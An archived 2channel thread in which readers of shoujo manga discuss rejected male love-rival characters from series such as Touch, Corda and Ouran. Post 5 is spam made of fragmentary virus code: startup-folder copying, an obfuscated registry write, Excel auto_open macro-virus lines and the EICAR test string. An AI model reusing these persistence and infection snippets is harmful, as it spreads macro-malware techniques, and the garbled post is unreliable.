5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【当て馬】振られる男キャラ2【かませ犬】

1 :花と名無しさん:2007/10/25(木) 07:23:33 ID:???0
古今東西の振られ男を語るスレです

前スレ
【当て馬】振られる男キャラ【かませ犬】
http://anime2.2ch.net/test/read.cgi/gcomic/1155815868/

2 :花と名無しさん:2007/10/25(木) 07:30:15 ID:6+MdfjhRO
某オサレ漫画にはこの手のキャラが師匠のお気に入りのオサレキャラを引き立たせるためにたくさん出てきます。

3 :花と名無しさん:2007/10/25(木) 10:08:42 ID:???0
なんのこと?>某オサレ漫画
スレたてはやくないか

4 :花と名無しさん:2007/10/25(木) 10:40:11 ID:???O
振られるから良い男に見えるのさ

5 :花と名無しさん:2007/10/25(木) 18:37:00 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :花と名無しさん:2007/10/25(木) 19:25:11 ID:???0
>>4
実際のところそれはかなりあると思う
かわいそうだから魅力的にみえてこっちのほうがよかったのにとなる

7 :花と名無しさん:2007/10/25(木) 20:55:38 ID:???O
火原

8 :花と名無しさん:2007/10/26(金) 01:11:24 ID:???0
コルダの火原は当て馬決定だろうな
土浦は微妙なところ
別にコルダはこっちとくっついてほしいとか思わないけど

9 :花と名無しさん:2007/10/26(金) 06:47:38 ID:???0
オサレ漫画ってブリーチのことだと思う
板違いだけど

10 :花と名無しさん:2007/10/26(金) 09:33:24 ID:???0
あの漫画に当て馬いたっけ

11 :花と名無しさん:2007/10/26(金) 12:39:51 ID:???O
というか恋愛漫画じゃないし
戦闘的にかませってことならそれこそスレ違い

12 :花と名無しさん:2007/10/26(金) 21:04:15 ID:???0
タッチの新田くん

13 :花と名無しさん:2007/10/26(金) 21:11:20 ID:???O
>>2は多分誤爆だろ

電脳ビリーバーズ
ナトリが報われたらコミクス買ってもいい

14 :花と名無しさん:2007/10/26(金) 22:18:34 ID:???0
タッチなら和也も…

15 :花と名無しさん:2007/10/26(金) 22:52:35 ID:???0
和也は髪型からして当て馬くさかった

16 :花と名無しさん:2007/10/27(土) 09:48:43 ID:???0
髪型wwww

17 :花と名無しさん:2007/10/27(土) 22:08:53 ID:???0
達也より新田のほうが好きだったなあ
まあ最初から当て馬確定してたけど

18 :花と名無しさん:2007/10/29(月) 20:07:55 ID:???0
さいとうちほの花音は、最終的にヒロインとくっ付くであろう方が当て馬に見えた

19 :花と名無しさん:2007/10/29(月) 23:56:58 ID:???0
ガッチャガチャの平尾、
当初は当て馬にすらならないくらいにヒロインの眼中になかったが
報われてよかった。

ていうか報われたからスレ違いか…

20 :花と名無しさん:2007/10/30(火) 20:30:00 ID:???0
平尾は報われたとしてもどこか当て馬臭がする。
なぜか嫌いにはなれない。

21 :花と名無しさん:2007/10/30(火) 22:03:01 ID:???O
平尾はなんか最終的にフラれそうな感じがする
もう障害ないのに何故かそう思ってしまうw

22 :花と名無しさん:2007/10/31(水) 00:13:06 ID:???0
平尾ひどい言われようすぎてワロスw
でもわかる

23 :花と名無しさん:2007/10/31(水) 09:38:43 ID:???0
平尾かわいいよ平尾

24 :花と名無しさん:2007/10/31(水) 15:08:02 ID:???O
平尾の人気に嫉妬

25 :花と名無しさん:2007/11/01(木) 12:36:01 ID:aeqrlKLJO
平尾人気高し。私も好きだ。

26 :花と名無しさん:2007/11/01(木) 21:47:09 ID:???O
でも、今回の友里のセリフだけ聞くと本命ヒーローは素子っぽくも感じるw


27 :花と名無しさん:2007/11/02(金) 05:42:33 ID:/mqFRVlt0
コルダの月森も当て馬(対抗馬かも)になりそう
ただ音が変わるために好きになる設定にされそう
自覚するけど告白しないで留学するか告白して玉砕のような気がする
なるべくなら前者をみてみたい


28 :花と名無しさん:2007/11/02(金) 18:50:33 ID:???O
普通に月森が本命かと思ってた
じゃあ誰が本命なんだ?

29 :花と名無しさん:2007/11/02(金) 21:44:16 ID:???0
いや月森がどうみても本命だろ
その他のワラワラは全員当て馬

30 :花と名無しさん:2007/11/02(金) 22:07:56 ID:???0
全員当て馬ってのもいいんじゃないかな

31 :花と名無しさん:2007/11/02(金) 22:13:25 ID:???0
改めてあて馬の定義とはなんぞやと思う
コルダみたいな逆ハーものなら本命以外は全部当て馬なのか?
当て馬ってもっと本命とどっちかわからないくらい深くかかわってるキャラかと思ってた
ヒロインも意識してる(してた)けど最終的には実らないってイメージ


32 :花と名無しさん:2007/11/02(金) 22:47:09 ID:???0
からくりオデットのクリス
登場回数も減った

33 :花と名無しさん:2007/11/02(金) 23:15:35 ID:???O
クリスは家族愛かと思ってた
オデットといえば柚木村の扱いが酷い
いつの間にか存在が消えたw
そしてトラヴィスは柚木村以上にわかりやすい当て馬ww

34 :花と名無しさん:2007/11/03(土) 10:36:12 ID:???0
ヒカルの碁
オチ。
三下要素満載

35 :花と名無しさん:2007/11/03(土) 11:27:39 ID:oKPesRUuO
とーじ

36 :花と名無しさん:2007/11/03(土) 13:37:50 ID:???0
でもコルダの月森って最初惹かれるけどくっつかないパターンっぽい
憧れの王子様タイプと身近なタイプで分類する前者パターンというか
少女漫画の王道パターンでいけば土浦とくっつきそう


37 :花と名無しさん:2007/11/03(土) 21:45:09 ID:???0
そもそもコルダや遥かは最終的に誰かとくっ付くような
展開になるように思えない。

38 :花と名無しさん:2007/11/04(日) 01:31:42 ID:???0
アンジェも最初はそんな感じだったけど
最後はくっついたな
でも特に当て馬らしい当て馬もいなかった

遥かはいくらなんでも半数以上のメイン男キャラが
ヒロインに惚れるのはやりすぎな気がするなぁ
いくら逆ハーでも惚れるのは2〜3人が妥当

39 :花と名無しさん:2007/11/05(月) 19:40:12 ID:???O
ああいう逆ハーものはくっつかなかった奴はみんな当て馬だし、
各当て馬の描写が薄いから感情移入するだけのドラマもなさそう
大量に候補がいてその中から最後の最後で誰かが選ばれるだけなイマゲ

40 :花と名無しさん:2007/11/05(月) 21:06:35 ID:???0
エデンの花のメガネ
私は兄派だったけど

41 :花と名無しさん:2007/11/05(月) 21:19:42 ID:???0
エデンの眼鏡は良かったね。
振られっぷりも潔かったし最終回も兄よりずっと印象に残った。

42 :花と名無しさん:2007/11/05(月) 21:28:45 ID:???0
エデン最終回どんなだったか忘れたw

43 :花と名無しさん:2007/11/05(月) 23:10:46 ID:???0
>>38
アンジェを風と火の人で取り合ってなかったけ?
途中までは誰ともくっつかない感じだった。
遥ならテンマは当て馬
ネオアンならどれだろ?

44 :花と名無しさん:2007/11/05(月) 23:17:13 ID:???0
遙かの天馬当て馬なんだ
最初のほうしかしらないから天馬かと思った
でもあの手のキャラって当て馬になりやすそうだな。コルダ土浦とかも

45 :花と名無しさん:2007/11/05(月) 23:37:45 ID:???O
>>39
主人公に恋愛感情抱いてなかったら当て馬とも言えんのでは?
コルダでいえば志水とか
まぁネオロマものだからこれから惚れる展開も来るかもだけど

46 :花と名無しさん:2007/11/06(火) 01:13:11 ID:???0
>>43
火の人はちょっとちょっかいかけてただけで
明確にアンジェに恋心を抱いてたのは風だけだな

47 :花と名無しさん:2007/11/06(火) 01:17:21 ID:???0
アンジェ逆ハーかと思ったらそうでもないんだな
じゃあ当て馬らしい当て馬も不在なのか
5人とか6人とかに好かれるのって異常だもんな…

48 :花と名無しさん:2007/11/06(火) 01:33:51 ID:???0
元がゲームだと誰とくっつけてもクレーム入りそう
BLになるけど学ベブの漫画版は一冊ごとに相手違う話だった
ケイタ浮気な子www

古いがときめきトゥナイトのリンゼくんが分離した時は
真面目系の本体とチャラオ系の分身でおいしかったわ
一つの体に二つの人格


49 :花と名無しさん:2007/11/07(水) 00:03:32 ID:???0
>>48
>BLになるけど学ベブの漫画版は一冊ごとに相手違う話だった
すげーw少女漫画でもこれやったら面白そうw

リンゼ同意。あれはニヤニヤした。

50 :花と名無しさん:2007/11/07(水) 00:09:20 ID:???0
ヘヴンの形式ってある意味一番理にかなってると思うけど
それぞれ別個の話なら不満も出ないだろうし平和
ゲーム原作って当て馬出すと問題だからか変に気を使ってて面白くないんだよな

51 :花と名無しさん:2007/11/07(水) 01:18:42 ID:???O
それだと攻略キャラのうち人気低めなキャラが一人二人いると仮定して、そいつと
結ばれるエンドのコミカライズだけ売れ行きイマイチだったりするんじゃないかな
純粋にストーリーが面白くて絵も綺麗なら売れるか?

そういやホトギミなんかは兄エンドの小説出たよね

52 :花と名無しさん:2007/11/07(水) 16:31:48 ID:???0
そんなんじゃねえよの烈と仁村
烈はあんなに好き好き迫ってた割りにあっさり手を引いたような気がする

53 :花と名無しさん:2007/11/07(水) 16:37:38 ID:uj8CGcRw0
ホスト部の光。
でも、環の方がいい男。

54 :花と名無しさん:2007/11/07(水) 18:08:14 ID:???0
他の漫画なら環のが当て馬になりそうだよね
先輩で何だかんだで人間できてるし
馨はよく分からんうちに脱落したから光はちゃんと振られて欲しい

55 :花と名無しさん:2007/11/07(水) 18:18:09 ID:???0
他の漫画だと金髪ヘタレ美形ってそもそも脇キャラ位置な気がする。
環はそのまま素直にくっついて欲しいと思える本命キャラだ

56 :花と名無しさん:2007/11/07(水) 19:52:29 ID:???0
ハチクロの竹本は不憫だった。
1月からドラマでやるんだな…

57 :花と名無しさん:2007/11/08(木) 15:53:23 ID:???0
>>52
仁村とくっつくと信じていた時期が私にもありました…
てっちゃんとくっついたのはなんかとーとつだったから納得いかなかったなー

誰が振られるかわからない漫画は追っかけ甲斐があるけど、
自分の希望してたカプじゃなかったときのがっかりっぷりは大きいな

58 :花と名無しさん:2007/11/09(金) 00:44:50 ID:???0
ビリーバーズ来月で最終回かー
那鳥の逆転はないんだろうかorz

59 :花と名無しさん:2007/11/09(金) 01:07:13 ID:???O
現在行く末の気になる当て馬ベスト3
1位龍花のクワン
2位ビリーバーズーのナトリ
3位微糖の知世

せめて一人くらいはヒロインと結ばれてくれ

60 :花と名無しさん:2007/11/09(金) 08:30:17 ID:???0
く、クワンは当て馬じゃないもん><

61 :花と名無しさん:2007/11/09(金) 14:19:08 ID:???0
クローバーのハルキ
どうしても柘植が好きになれないのでハルキとくっついてほしい

62 :花と名無しさん:2007/11/11(日) 17:38:02 ID:???0
>>61
自分もどうしても柘植が好きになれない…
つかハルキは当初はヒーローの筈だったのに予定変更されたのがムナシス

63 :花と名無しさん:2007/11/11(日) 21:43:10 ID:???0
>>62
mid?
拓植の人気が出たのでヒーロー昇格ってこと?

64 :花と名無しさん:2007/11/12(月) 00:22:05 ID:???O
柘植が好きじゃなくて1巻で読むのやめてしまった
ハルキなら読んだのにな

65 :花と名無しさん:2007/11/12(月) 07:51:51 ID:???0
僕等がいたの竹内(´;ω;`)

66 :花と名無しさん:2007/11/13(火) 13:21:26 ID:???0
ギャリズムだっけ?
あれの黒髪はやっぱり当て馬エンドだったの?

67 :花と名無しさん:2007/11/13(火) 15:14:00 ID:???O
>>66
当て馬です
ヒロインの姉といい雰囲気になりかけて終わった筈

68 :花と名無しさん:2007/11/13(火) 15:48:54 ID:???0
>>67
dくす。
う〜んorz

69 :花と名無しさん:2007/11/14(水) 22:05:39 ID:???O
ピーチガールを初めて読んだ。
とーじが当て馬なのは知ってたけど最後までどっちかわからないかんじの展開だったんだな
そしてやっぱりとーじのほうがいいのにと思ってしまった。
ヒロインがふらふらしすぎなのもなんかな

70 :花と名無しさん:2007/11/17(土) 10:56:31 ID:???0
>>63
クローバーの初回の予告カットがハルキと2ショットのものだった
本当はクローバーはサヤが女優に転身する話にする予定で
1巻を見ると伏線もちょこ張ってある
サヤが長身設定なのもそのせい。
けどOLものってのが当時受けて、脱OLさせるわけにもいかず
最初の彼氏で終わるはずだった柘植がメインヒーローに昇格したらしい

71 :花と名無しさん:2007/11/17(土) 11:20:23 ID:???0
おにいちゃんと一緒の鈴木くん
片桐くんの振られっぷりもいいが
舞台にすら上がれない鈴木くんがイイ

72 :花と名無しさん:2007/11/17(土) 11:56:16 ID:???0
やっぱ当て馬といったら銀太しかいない

73 :花と名無しさん:2007/11/17(土) 12:48:02 ID:???0
当て馬カップル
で即座に浮かぶのは銀太と有美だよな
ヒロインとヒーローに振られた同士のカップル

74 :花と名無しさん:2007/11/17(土) 19:50:37 ID:E0KDZA670
銀太って光希に振られたけど、光希よりも美人な亜梨実とくっついたから
あんまり可哀想ではないな。
どちらかというとめいこに振られた三輪さんの方が可哀想。
名村より三輪さんの方が断然いい男なのに‥‥。

75 :花と名無しさん:2007/11/17(土) 20:07:34 ID:???0
ものすごい古いけどふしぎ遊戯の髪長い皇帝の人

76 :花と名無しさん:2007/11/17(土) 20:34:06 ID:???O
>>75
星宿か
鬼宿より好きだったな

77 :花と名無しさん:2007/11/17(土) 21:25:21 ID:???0
コスアニのアラタ
不憫すぐる…

78 :花と名無しさん:2007/11/17(土) 22:04:55 ID:???0
「せいせいするほど愛してる」の宮沢
これぞザ・当て馬って感じ

79 :花と名無しさん:2007/11/17(土) 22:34:09 ID:???0
ママボのありみに振られたギンタの従兄弟。むっちゃ不幸だと思った

80 :花と名無しさん:2007/11/17(土) 23:10:59 ID:o6AKP4wCO
三輪さんかっこいいよね。

81 :花と名無しさん:2007/11/18(日) 00:13:41 ID:???0
>>77
表紙見て一目ぼれしたけど、
当て馬だと知って結局読んでない…

82 :花と名無しさん:2007/11/18(日) 00:59:23 ID:???0
自分が読んでる漫画ふたつで、本命×ヒロインの怒涛のラブラブラッシュ。
スレが盛り上がっている。でもその楽しそうなスレを見るのがつらいので、そっとブクマをはずしたよ。

83 :花と名無しさん:2007/11/18(日) 16:06:30 ID:???0
>>82
どのスレか気になる

84 :花と名無しさん:2007/11/18(日) 23:34:41 ID:???0
>>82
同じく気になる。吐き出しちゃえ

85 :花と名無しさん:2007/11/19(月) 00:28:33 ID:???O
>>82
本命ヒーローとヒロインが現在ラブラブラッシュっていうとホスト部とかか?

86 :花と名無しさん:2007/11/19(月) 10:30:40 ID:cS4Q1JY+0
ホスト部は環がいい男すぎて当て馬である光がかすむよね。
光は顔はいいけど性格悪いし、でも環は顔も性格も良い。
本命キャラが当て馬よりいい男で素直に応援できるのって
今まで読んできた少女漫画ではホスト部だけ。

87 :花と名無しさん:2007/11/19(月) 10:49:37 ID:???0
>>86
( ゚д゚ )

88 :花と名無しさん:2007/11/19(月) 11:40:30 ID:???O
>>86
ここは当て馬を語るスレですよw

89 :花と名無しさん:2007/11/19(月) 12:12:20 ID:???O
そもそも光は当て馬と言えるほどの当て馬なのか?

90 :花と名無しさん:2007/11/19(月) 12:23:29 ID:???0
>>89
光は当て馬レベルじゃないだろ常識的に考えて
>>86がただのホスト部ヲタなだけ

91 :花と名無しさん:2007/11/19(月) 12:35:11 ID:???0
ハツカレのイブシ

92 :花と名無しさん:2007/11/19(月) 13:46:38 ID:???0
パティスリーMONも最近は主役と本命にスポットあたってるね

93 :花と名無しさん:2007/11/19(月) 14:01:40 ID:???0
>>92
その場合の本命は大門?
わたし先生派なんだけどなorz

94 :花と名無しさん:2007/11/19(月) 17:15:48 ID:???0
>>93
おなじく先生派…

95 :花と名無しさん:2007/11/19(月) 18:19:09 ID:???0
自分も最近は先生の方が好きだ
音女に振られたらスパッと離れて新しい職場で頑張ってるのがいい
もっと粘着質な腹黒キャラだと思ってたよ先生

96 :花と名無しさん:2007/11/19(月) 22:07:44 ID:???0
>>77
黒髪+メガネでストライクど真ん中なんだけどなぁorz

97 :花と名無しさん:2007/11/20(火) 05:50:55 ID:x/oWBBjs0
プリンセスの究極ヴィ−ナスの主人公の片思いの相手、八朔ていうキャラ
意外と最後は伊予とくっつきそう

98 :花と名無しさん:2007/11/20(火) 06:28:07 ID:???0
フルバのユキは当て馬かと思ったらなんかお母さんとか言い出して脇キャラとくっついてしまった…
なんだったんだあれは

99 :花と名無しさん:2007/11/20(火) 06:44:46 ID:???0
由希は当て馬詐欺

100 :花と名無しさん:2007/11/20(火) 09:14:41 ID:???0
>>97
私も八朔とはくっつかないような気がする。

101 :花と名無しさん:2007/11/21(水) 16:01:53 ID:???0
マイナーだけどトッペンカムデンへようこそのラズウェル
最後までさわやかだった

102 :花と名無しさん:2007/11/21(水) 23:35:46 ID:???0
自分は最後の最後までラズ派だったんだよなぁ…
レジーとは悲恋の方が萌えると思ってた

103 :花と名無しさん:2007/11/22(木) 08:26:32 ID:???0
学園王子の赤丸
赤丸のほうがいいと思うんだが…

104 :花と名無しさん:2007/11/22(木) 13:38:33 ID:J0M93iR60
ベイビィ・ラブの由希。
切なすぎ。

105 :花と名無しさん:2007/11/22(木) 14:00:07 ID:???0
>>103
おなじく赤丸派
梓はアフォすぎて萌えん

106 :花と名無しさん:2007/11/22(木) 17:32:10 ID:hayHgLrPO
私もフルバゆきは謎だったわ。何あれ(笑)

107 :花と名無しさん:2007/11/22(木) 17:35:06 ID:???O
>>103>>105
同意
梓はKYぶりがギャグを越えててイタイ
赤丸が普通にかっこいいのと梓がダメすぎるので赤丸派

108 :花と名無しさん:2007/11/22(木) 18:08:18 ID:???0
でもどう見ても赤丸は当て馬くさいね。

109 :花と名無しさん:2007/11/22(木) 18:19:01 ID:???O
作者が梓萌えだからな…
希望がないとわかっていても赤丸がいい

110 :花と名無しさん:2007/11/22(木) 20:20:30 ID:???O
>>109
え、そうなの?
萌えてるんならもう少しかっこよく(見た目じゃなく中身)描いてあげたらいいのにw

111 :花と名無しさん:2007/11/23(金) 02:53:45 ID:???0
少コミ作品の当て馬は報われないどころか
主役カポーのための装置でしかない奴ばっかりだなあ、と
青木スレ読んでて思った

112 :花と名無しさん:2007/11/23(金) 09:02:10 ID:???O
ヴァンパイア騎士の枢。もう当て馬な感じ満々…orz
好きなのに

113 :花と名無しさん:2007/11/23(金) 09:10:36 ID:???0
枢とクワンは見事なまでに当て馬街道まっしぐらだ。

114 :花と名無しさん:2007/11/23(金) 09:30:23 ID:???0
その二人って死亡フラグもくっついてるからなー

115 :花と名無しさん:2007/11/23(金) 17:12:29 ID:???0
コルダの月森と土浦はどっちが当て馬かな。くっつくならこのどっちかだろうけど
火原は当て馬というレベルですらなさそうだ

116 :花と名無しさん:2007/11/23(金) 18:57:53 ID:???0
>>113
クワンはまだまだ可能性があるんよ!

117 :花と名無しさん:2007/11/23(金) 19:48:19 ID:???0
コルダは月森しかいないでそ
土浦はその他と同レベルに見える

118 :花と名無しさん:2007/11/23(金) 21:34:55 ID:???0
>>104
同じく
花火のシーンが泣けた・・・

119 :花と名無しさん:2007/11/23(金) 22:20:37 ID:???O
>>111
少コミとかのエロ系漫画はあからさまな当て馬多いよね
負ける為に生まれたかのような

120 :花と名無しさん:2007/11/24(土) 14:32:05 ID:???0
クワンてやっぱり当て馬なのか??
今の展開は本命街道にしか見えない自分がおかしいのか

121 :花と名無しさん:2007/11/25(日) 00:42:36 ID:???O
どっちが当て馬臭いとかじゃなく、ヒロインであるシャクヤが
今までずっと好きだった男から簡単に心変わりするような
キャラに見えないからクワン本命なんじゃないかと自分は思う

122 :花と名無しさん:2007/11/25(日) 01:04:57 ID:???O
クワンが死んだらそれも危ういような…
ルシンの存在意義とか考えたら変な深読みをしてしまう

123 :花と名無しさん:2007/11/25(日) 03:14:25 ID:???0
一話読んだ時はルシンが本命っぽいなあと思ったんだけど、
最近の展開だとどっちかわからんよなー
このスレでは希少なルシン派だけど、ぜんぜん安心できない

>>119
ある意味当て馬としては正しいキャラ設定だとおもうけど、
結局主役マンセーのための駒でしかないと萌えないよなあ

124 :花と名無しさん:2007/11/25(日) 13:39:04 ID:???0
>>123
人物がアカラサマに記号や駒に見える時点で
人間描写が駄目ってことだから正しいとは思えないが

125 :花と名無しさん:2007/11/25(日) 21:00:18 ID:???0
>>124
当て馬としての役割を全うしているという意味で正しいと言ったんだが
そもそも「ある意味で」って言ってるじゃん

126 :花と名無しさん:2007/11/26(月) 22:06:16 ID:???0
聖なる花嫁の反乱

まだはじまったばかりだが、やさしげで王子様なクリスって当て馬な気がする。
相手役は主人公と反発しあっているザディアスな気がするんだよなー。
恋人同士と紹介にはあるし、好きあっているけど全然本気で恋しているようには見えない…。

127 :花と名無しさん:2007/11/29(木) 17:43:11 ID:???O
あげ

128 :花と名無しさん:2007/11/30(金) 01:17:00 ID:???O
以前>>59を書いた者だが…

今物凄く土俵際に追いやられてる気分\(^o^)/
とりあえず知世ドンマイ

129 :花と名無しさん:2007/12/01(土) 22:13:24 ID:???O
パティスリーMONの先生
途中から薄々気付いてたけど今日五巻を読んだら…
先生切なすぎる!
掴めないとこあるし腹黒そうに見えるキャラだけど
格好いいのに気取ってない感じが良かった
しかもワイルド系に憧れてるのが可愛い
大門も嫌いじゃないけど先生が何だか寂しいよ

130 :花と名無しさん:2007/12/02(日) 20:01:40 ID:6hlT/M2b0
そう思いたくないけど
龍の花わずらいのクワン


131 :花と名無しさん:2007/12/02(日) 20:12:53 ID:???0
わざわざageんな

132 :花と名無しさん:2007/12/02(日) 22:16:16 ID:apa/hjCWO
BASARAのあさぎ
あさぎの方が良かった

133 :花と名無しさん:2007/12/02(日) 23:20:12 ID:???0
BASARAのあげは
主人公のために片目失って尻も掘られて
なんという犠牲の払いっぷり

134 :花と名無しさん:2007/12/04(火) 15:18:11 ID:???0
スキビの尚だっけ?
あれは当て馬とは言わないかな?

24 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)